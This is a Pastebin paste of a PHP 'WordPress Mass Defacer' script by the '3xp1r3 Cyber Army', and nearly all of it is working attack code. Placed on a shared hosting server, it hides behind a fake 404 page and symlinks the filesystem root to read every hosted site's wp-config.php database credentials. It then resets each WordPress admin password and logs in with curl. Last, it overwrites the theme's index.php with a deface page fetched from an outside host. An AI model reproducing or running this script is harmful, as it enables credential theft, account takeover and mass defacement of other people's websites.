t3ll0

[PHP] Joomla Wordpress Mass Defacer

Apr 1st, 2013
3,322
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. //=======================================
  3. // !! Script Decoded Decoder Online !!
  4. // !! http://www.decoder-online.com/ !!
  5. // !! 22-08-2012
  6. //=======================================
  7.  
  8.  
  9. ini_set("display_errors", "0");
  10. set_time_limit(0);
  11. @session_start();
  12. $auth_pass = '7690ee925772d491670de4c86c03da69';
  13. $base_path = dirname(__FILE__).'/';
  14.  
  15. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
  16. if(empty($auth_pass) || (isset($_GET['pass']) && (md5($_GET['pass'])==$auth_pass))) {
  17. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  18. } else {
  19. printLogin();
  20. }
  21. }
  22.  
  23. function printLogin() {
  24. echo '<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr>'.($_SERVER['SERVER_SIGNATURE']?$_SERVER['SERVER_SIGNATURE']:'<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>');exit;
  25. }
  26.  
  27. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  28. $ar0=explode($marqueurDebutLien, $text);
  29. $ar1=explode($marqueurFinLien, $ar0[$i]);
  30. return trim($ar1[0]);
  31. }
  32.  
  33. function randomt() {
  34. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  35. srand((double)microtime()*1000000);
  36. $i = 0;
  37. $pass = '';
  38. while ($i <= 7) {
  39. $num = rand() % 33;
  40. $tmp = substr($chars, $num, 1);
  41. $pass = $pass . $tmp;
  42. $i++;
  43. }
  44. return $pass;
  45. }
  46.  
  47. function index_changer_wp($conf, $content) {
  48. $output = '';
  49. $dol = '$';
  50. $username = entre2v2($conf,"define('DB_USER', '","');");
  51. $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
  52. $dbname = entre2v2($conf,"define('DB_NAME', '","');");
  53. $prefix = entre2v2($conf,$dol."table_prefix = '","'");
  54. $host = entre2v2($conf,"define('DB_HOST', '","');");
  55.  
  56. $link=mysql_connect($host,$username,$password);
  57. if($link) {
  58. mysql_select_db($dbname,$link) ;
  59. $dol = '$';
  60. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '".$dol."P".$dol."BpAdo5GPHYYw778chUGOokkzTPnOSP.' WHERE `ID` = 1");
  61. } else {
  62. $output.= "[-] DB Error<br />";
  63. }
  64. if($req1) {
  65.  
  66. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  67. $data = mysql_fetch_array($req);
  68. $site_url=$data["option_value"];
  69.  
  70. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
  71. $data = mysql_fetch_array($req);
  72. $template = $data["option_value"];
  73.  
  74. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
  75. $data = mysql_fetch_array($req);
  76. $current_theme = $data["option_value"];
  77.  
  78. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  79. $url2=$site_url."/wp-login.php";
  80.  
  81. $ch = curl_init();
  82. curl_setopt($ch, CURLOPT_URL, $url2);
  83. curl_setopt($ch, CURLOPT_POST, 1);
  84. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=3xp1r3_CA123&rememberme=forever&wp-submit=Log In&testcookie=1");
  85. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  86. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  87. curl_setopt($ch, CURLOPT_HEADER, 0);
  88. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  89. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  90. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  91. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  92. $buffer = curl_exec($ch);
  93.  
  94. $pos = strpos($buffer,"action=logout");
  95. if($pos === false) {
  96. $output.= "[-] Login Error<br />";
  97. } else {
  98. $output.= "[+] Login Successful<br />";
  99. }
  100.  
  101. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
  102. curl_setopt($ch, CURLOPT_URL, $url2);
  103. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  104. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  105. curl_setopt($ch, CURLOPT_HEADER, 0);
  106. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  107. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  108. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  109. $buffer0 = curl_exec($ch);
  110.  
  111. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  112. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  113.  
  114. if(substr_count($_file,"/index.php") != 0){
  115. $output.= "[+] index.php loaded in Theme Editor<br />";
  116. } else {
  117. $output.= "[-] index.php can not load in Theme Editor<br />";
  118. }
  119.  
  120. $url2=$site_url."/wp-admin/theme-editor.php";
  121. curl_setopt($ch, CURLOPT_URL, $url2);
  122. curl_setopt($ch, CURLOPT_POST, 1);
  123. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$content."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  124. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  125. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  126. curl_setopt($ch, CURLOPT_HEADER, 0);
  127. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  128. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  129. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  130. $buffer = curl_exec($ch);
  131. curl_close($ch);
  132.  
  133. $pos = strpos($buffer,'<div id="message" class="updated">');
  134. $cond = 0;
  135. if($pos === false) {
  136. $output.= "[-] Updating Index.php Error<br />";
  137. } else {
  138. $output.= "[+] Index.php Updated Successfuly<br />";
  139. $cond = 1;
  140. }
  141. } else {
  142. $output.= "[-] DB Error<br />";
  143. }
  144. global $base_path;
  145. unlink($base_path.'COOKIE.txt');
  146. return array('cond'=>$cond, 'output'=>$output);
  147. }
  148.  
  149. function exec_mode_1($def_url) {
  150.  
  151. @mkdir('sym',0777);
  152. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  153. $fp = @fopen ('sym/.htaccess','w');
  154. fwrite($fp, $wr);
  155. @symlink('/','sym/root');
  156. $dominios = @file_get_contents("/etc/named.conf");
  157. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  158. $out[1] = array_unique($out[1]);
  159. $numero_dominios = count($out[1]);
  160. echo "Total domains: $numero_dominios <br><br />";
  161. $def = file_get_contents($def_url);
  162. $def = urlencode($def);
  163. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
  164. $output = fopen('defaced.html', 'a+');
  165. $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
  166. $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
  167. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  168. $j = 1;
  169. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
  170. for($i = $st; $i <= $numero_dominios; $i++)
  171. {
  172. $domain = $out[1][$i];
  173. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
  174. $infos = @posix_getpwuid($dono_arquivo);
  175.  
  176. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
  177.  
  178. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  179.  
  180. if($config02 && preg_match('/DB_NAME/i',$config02)){
  181. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  182. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  183. $res = index_changer_wp($config02, $def);
  184. echo '<td>'.$res['output'].'</td>';
  185. if($res['cond']) {
  186. echo '<td align="center"><span class="green">DEFACED</span></td>';
  187. fwrite($output, 'http://'.$domain."<br>");
  188. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  189. } else {
  190. echo '<td align="center"><span class="red">FAILED</span></td>';
  191. }
  192. echo '</tr>';
  193. }
  194. }
  195. echo '</table>';
  196. echo '<hr/>';
  197. echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).'<br />';
  198. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  199. }
  200.  
  201. echo '<!DOCTYPE html>
  202. <html>
  203. <head>
  204. <title>3xp1r3 Cyber Army</title>
  205. <style type="text/css">
  206. body {color: white; background: #000 url(http://i1157.photobucket.com/albums/p593/ibot_zone/600_600.png) no-repeat 50% 50%;font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
  207. .header {position:fixed;width:100%;top:0;background:#000;}
  208. .footer {position:fixed;width:100%;bottom:0;background:#000;}
  209. input[type="submit"]{background-color:rgba(25,25,25,0.6);font-size: 45px;font-weight:bold;color: red;font-family: Tahoma; border: 1px solid #666666;height:100px;width:250px;}
  210. input[type="submit"]:hover{color:SeaShell;}
  211. input[type="radio"]{margin-top: 0;}
  212. .even {background-color: rgba(25, 25, 25, 0.6);}
  213. .odd {background-color: rgba(102, 102, 102, 0.6);}
  214. a {color:#fff;} a:hover {color:#00BFFF;}
  215. fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
  216. textarea{background: rgba(0,0,0,0.6); color: white;}
  217. .green {color:#00FF00;font-weight:bold;}
  218. .red {color:#FF0000;font-weight:bold;}
  219. .killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
  220. </style>
  221. <script type="text/javascript">
  222. function change() {
  223. if(document.getElementById(\'rcd\').checked == true) {
  224. document.getElementById(\'tra\').style.display = \'\';
  225. } else {
  226. document.getElementById(\'tra\').style.display = \'none\';
  227. }
  228. }
  229. function hide() {
  230. document.getElementById(\'tra\').style.display = \'none\';
  231. }
  232. </script>
  233. </head>
  234. <body>
  235. <div class="header">
  236. <h1 style="font-family: cursive;text-align: center;">!....::: 3xp1r3 AK-47 Deface Gun :::...!</h1>
  237. </div>
  238. <div class="footer">
  239. <h3 style="text-align: center;">?? 3xp1r3 Cyber Army. Coded By - Dr3@m3r~1986</h3>
  240. </div>
  241. <div style="background: rgba(0,0,0,0.5);padding:90px 0 65px 0;">
  242. <h2 style="color:#0066FF;text-align: center;">Wordpress Mass Defacer Version 2.3</h2>';
  243. if(!isset($_POST['form_action'])){
  244. echo '<div align="center">
  245. <form action="" method="post">
  246. <input type="hidden" name="form_action" value="1">
  247. <input class=submit type="submit" value="!!! FIRE !!!" name="Submit">
  248. </form>
  249. </div>';
  250. }
  251. echo '<div align="center">';
  252. if($_POST['form_action'] == 1) {
  253. exec_mode_1('http://familypride.tk/tfp.htm');
  254. }
  255. echo '</div>
  256. </div>
  257. </body>
  258. </html>';
  259. ?>
RAW Paste Data